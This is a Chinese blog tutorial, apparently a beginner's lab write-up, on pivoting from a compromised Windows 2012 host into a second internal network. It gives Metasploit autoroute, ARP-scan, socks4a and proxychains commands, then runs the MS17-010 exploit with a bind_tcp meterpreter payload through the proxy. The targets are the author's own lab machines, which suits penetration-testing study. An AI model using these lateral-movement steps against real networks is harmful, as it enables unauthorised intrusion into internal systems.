初学内网渗透之代理跳板攻击

TRY 6,712 1

至少我们曾经在一起过。

来自:一言

前言

经过前面的学习操作,我们已经 拿到一台服务器的权限了,然后通过查看靶机的网络信息,发现是双网卡,就是说是两层网络,通过kali是不能直接与另外一台服务器通信的,所以我们需要用这个靶机做代理跳板去攻击第二层网络的靶机。[aru_34]

kali:192.168.137.138

Win2012靶机:192.168.137.129    网卡二:1.1.2.2

靶机二:未知

相关命令:

  • run get_local_subnets //获取网段
  • run autoroute -s 192.168.250.1/24 //添加路由
  • run autoroute -p //查看路由
  • run autoroute -d -s 172.2.175.0 //删除网段
  • run post/windows/gather/arp_scanner RHOSTS=1.1.2.0/24 //扫描该网段下存活的主机

实战演练

  • 1.在meterpreter下先查看路由表
    • 命令:route
    • 初学内网渗透之代理跳板攻击
  • 2.然后手动添加路由
    • 命令:run autoroute -s 1.1.2.0/24
    • (也可以用 run post/multi/manage/autoroute  自动添加路由)
    • 初学内网渗透之代理跳板攻击
    • (添加成功)[aru_41]
  • 3.然后查看路由表信息,和扫描该网段下的主机
    • 查看已经添加的路由:run autoroute -p
    • 初学内网渗透之代理跳板攻击
    • 扫描该网段下的主机:run post/windows/gather/arp_scanner RHOSTS=1.1.2.0/24
    • 初学内网渗透之代理跳板攻击
  • 4.使用socket代理
    • 先background把session挂在后台
    • 命令:use auxiliary/server/socks4a
    • (用set命令修改参数,如果端口被占用,可以改别的)
    • 初学内网渗透之代理跳板攻击
    • 修改好后用run运行(成功运行)
    • 初学内网渗透之代理跳板攻击
    • 然后复制一个新会话,修改proxychains的配置文件
      • vim /etc/proxychains.conf(在配置文件最后修改)
    • 初学内网渗透之代理跳板攻击
    • 最后测试代理是否成功
      • cp /usr/lib/proxychains3/proxyresolv /usr/bin/
      • proxyresolv 1.1.2.1
      • 初学内网渗透之代理跳板攻击
      • 代理配置成功![aru_31]
  • 5.最后利用代理打开msf进行跳板攻击
    • 启动命令:proxychains msfconsole
    • 使用ms17-010漏洞(因为是事先准备好的靶机,所以知道存在什么漏洞,不知道的情况下,大家只有去扫了)
    • 注意:因为这里我们是用的代理去进行攻击的,所以payload需要设置成bind的,如:windows/x86/meterpreter/bind_tcp
    • 设置好相关参数直接攻击就可以了。
    • 初学内网渗透之代理跳板攻击
    • (通过代理攻击成功,已经拿到1.1.2.1的权限[aru_23])

总结

自己胡乱搭建的内网环境,中间也出现了一些问题,不过还算是成功了吧,写的比较乱,如果发现二层网络里还有其他网络的话就需要进行多层跳板代理,ip太多,容易记错。大佬们笑笑就好了[aru_70]

发表评论 取消回复
表情 图片 链接 代码

  1. 脉冲网
    脉冲网 Lv 1

    [aru_42][aru_42] key 可以

分享